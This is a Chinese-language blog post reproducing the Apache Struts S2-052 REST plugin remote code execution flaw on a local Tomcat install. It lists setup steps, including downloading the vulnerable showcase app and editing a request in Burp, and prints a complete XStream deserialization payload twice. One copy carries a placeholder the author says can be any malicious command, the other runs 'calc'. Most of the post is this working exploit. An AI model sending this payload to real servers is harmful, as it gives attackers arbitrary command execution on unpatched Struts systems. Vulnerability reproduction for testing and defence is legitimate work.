• Struts S2-052漏洞利用


    昨天在FreeBuf上看到【9月6日更新】漏洞预警 | 高危Struts REST插件远程代码执行漏洞(S2-052)

    然而一直复现不了,今天又试了下竟然成功了。

    由于水表查的较严,就不冒险搞别人的服务器了,直接在本地测试下。

    测试步骤:

    1、下载官方有漏洞版本工程:http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip

    2、把那个struts2-rest-showcase.war丢到tomcat的webapps 下,启动tomcat

    3、在浏览器访问:http://localhost:8080/struts2-rest-showcase/orders.xhtml

    4、启动BP代理9090端口,并且在浏览器配置代理

    5、点击表单的View,修改BP中的请求参数

      写入http头:Content-Type: application/xml

      写入poc:

    <?xml version="1.0" encoding="utf-8"?>
    
    <map> 
      <entry> 
        <jdk.nashorn.internal.objects.NativeString> 
          <flags>0</flags>  
          <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> 
            <dataHandler> 
              <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> 
                <is class="javax.crypto.CipherInputStream"> 
                  <cipher class="javax.crypto.NullCipher"> 
                    <initialized>false</initialized>  
                    <opmode>0</opmode>  
                    <serviceIterator class="javax.imageio.spi.FilterIterator"> 
                      <iter class="javax.imageio.spi.FilterIterator"> 
                        <iter class="java.util.Collections$EmptyIterator"/>  
                        <next class="java.lang.ProcessBuilder"> 
                          <command> 
                            <string>你要执行的代码</string> 
                          </command>  
                          <redirectErrorStream>false</redirectErrorStream> 
                        </next> 
                      </iter>  
                      <filter class="javax.imageio.ImageIO$ContainsFilter"> 
                        <method> 
                          <class>java.lang.ProcessBuilder</class>  
                          <name>start</name>  
                          <parameter-types/> 
                        </method>  
                        <name>foo</name> 
                      </filter>  
                      <next class="string">foo</next> 
                    </serviceIterator>  
                    <lock/> 
                  </cipher>  
                  <input class="java.lang.ProcessBuilder$NullInputStream"/>  
                  <ibuffer/>  
                  <done>false</done>  
                  <ostart>0</ostart>  
                  <ofinish>0</ofinish>  
                  <closed>false</closed> 
                </is>  
                <consumed>false</consumed> 
              </dataSource>  
              <transferFlavors/> 
            </dataHandler>  
            <dataLen>0</dataLen> 
          </value> 
        </jdk.nashorn.internal.objects.NativeString>  
        <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> 
      </entry>  
      <entry> 
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>  
        <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
      </entry> 
    </map>
    

    其中 “你要执行的代码” 可以是任意恶意代码,但是要根据服务器系统而定。我把他替换为terminator,表示打开一个终端窗口。

    可以看到:执行成功

    基本步骤就是这样了。

     未格式化的poc如下:

    <map>
    <entry>
    <jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>calc</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    </entry>
    </map>
  • 相关阅读:
    Java多线程之赛跑游戏(含生成exe文件)
    JavaSE之绘制菱形
    JavaSE项目之员工收录系统
    深度解析continue,break和return
    如何查看yum安装路径
    转载 linux umount 时出现device is busy 的处理方法--fuser
    linux安装扩展总结
    linux 编译安装amqp
    vmware 实现linux目录映射window本地目录
    yaf学习之——生成yaf示例框架
  • 原文地址:https://www.cnblogs.com/lanqie/p/7488850.html
Copyright © 2020-2023  润新知